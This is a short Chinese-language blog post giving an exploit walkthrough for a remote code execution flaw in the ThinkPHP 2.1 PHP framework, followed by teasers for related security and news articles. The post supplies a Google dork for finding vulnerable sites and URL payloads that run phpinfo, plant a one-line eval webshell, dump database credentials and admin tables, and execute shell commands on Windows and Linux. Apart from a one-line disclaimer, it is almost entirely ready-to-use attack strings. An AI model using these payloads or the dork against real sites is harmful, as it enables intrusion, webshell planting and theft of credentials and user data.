Thinkphp2.1漏洞利用

thinkphp2.1版本

Google语法:

inurl:index.php intext:ThinkPHP 2.1 { Fast & Simple OOP PHP Framework }  禁止用在非法用途

进行测试,输出phpinfo

?
1
index.php/Index/index/name/$%7B@phpinfo%28%29%7D

输出版本信息:

?
1
index.php/module/action/param1/${@print(THINK_VERSION)}

写入一句话

?
1
index.php/module/action/param1/${@print(eval($_POST[c]))}

一些其他执行语句:

1.使用c方法,获取其他数据库 配置相关信息:c(db_name)、c(db_host)、c(db_user)、c(db_pwd)等

?
1
/index.php/module/action/param1/$%7b@print(c(db_name))%7d

3.使用d方法或者m方法,查询其他数据库 ,最典型的使用方式var_dump(d(admin)->select()),能够查询出管理员信息,当然,表名需要猜一下,一般是admin,user等

?
1
/index.php/module/action/param1/$%7b@print(var_dump(d(admin)->select()))%7d

4.利用php在“·”(tab键上面的键,url编码后为%60)之间的内容可以当做命令执行的方式,不管是windows还是linux下,都可以执行cmd或者是shell命令。

?
1
2
3
index.php/module/action/param1/$%7b@print(%60dirls%60)%7d  ---------- 在windows下
index.php/module/action/param1/$%7b@print(%60ls%60)%7d -------------在linux下
(0)

相关推荐

  • 模块化设计

    一个典型的URL访问规则是(我们以默认的PATHINFO模式为例说明,当然也可以支持普通的URL模式): http://serverName/index.php(或者其他应用入口文件)/模块/控制器/ ...

  • 虚假的安全:五大Android厂商自带隐私保护应用脆弱性分析及漏洞利用

    Author: Xiangqian Zhang, Huiming Liu of Tencent Security Xuanwu Lab 0x00 简介 本文我们将详细介绍对Android手机厂商自带的 ...

  • 反序列化漏洞利用总结

    反序列化无论在CTF比赛中,抑或是实战渗透中都起着重要作用,而这一直都是我的弱项之一,所以写一篇反序列化利用总结来深入学习一下 <!-- more --> 简单介绍 (反)序列化只是给我们 ...

  • 堆入门之常见漏洞利用

    这里把sz转换成了unsigned int ,也就是只取低四个字节,然后右移4并减2,这样我们的size 0x????????xxxxxxx? 中的?可以是任意值. 另:由于在Glibc 2.27中新 ...

  • 利用肯德基系统漏洞诈骗20余万 上海5名大学生获刑

    东方网记者刘理.通讯员张超5月11日报道:在校大学生利用肯德基APP客户端和微信客户端之间数据不同步的漏洞,骗取兑换券或取餐码售与他人牟利,并将诈骗方法传授给同学,给肯德基品牌所有者百盛公司造成20余 ...

  • 招标文件的编制漏洞被利用? 这也太“坑”了

    招标文件作为招投标行为的目标方向和大体要求,在招投标中有着最基础的作用地位--也因此招标文件被一些私利蒙心惯用套路的人所利用,通过招标文件的编制漏洞使投标人"入坑". 一.付款时间 ...

  • 浅评大学生利用订餐漏洞薅肯德基“羊毛”获刑案

    近日,"大学生利用肯德基订餐漏洞诈骗获刑"的话题冲上热搜,引发关注.本文结合该案的案情从刑事专业角度对于公众如何规范自身行为,防范涉刑风险进行分析.剖析. 一.利用订餐漏洞薅&qu ...

  • APT行为者越来越多地利用漏洞来发起攻击

    过去三个月,高级可持续性威胁活动的主要浪潮是由供应链攻击和零日漏洞驱动的.SolarWind公司用于监控IT基础设施的Orion IT软件被入侵,导致18,000多个客户网络被安装了一个定制后门,而M ...

  • 利用漏洞免费吃肯德基,到底该不该判刑?

    舒圣祥 · 2021-05-13 10:11 来源:齐鲁壹点 在校大学生徐某利用肯德基APP客户端和微信客户端之间数据不同步的漏洞,骗取兑换券或取餐码,出售给他人牟利,并将犯罪方法传授给同学,造成肯德 ...

  • 大学生利用软件漏洞免费吃肯德基获刑 系统会被骗吗?

    袁椿晖 刑事专业律师 大学生徐玉玉被诈骗案中徐玉玉代理律师 北京盈科律师事务所合伙人 案情 徐某是江苏某大学的一名在校生.2018年4月,在用肯德基客户端点餐时,徐某无意发现两个"生财小门道 ...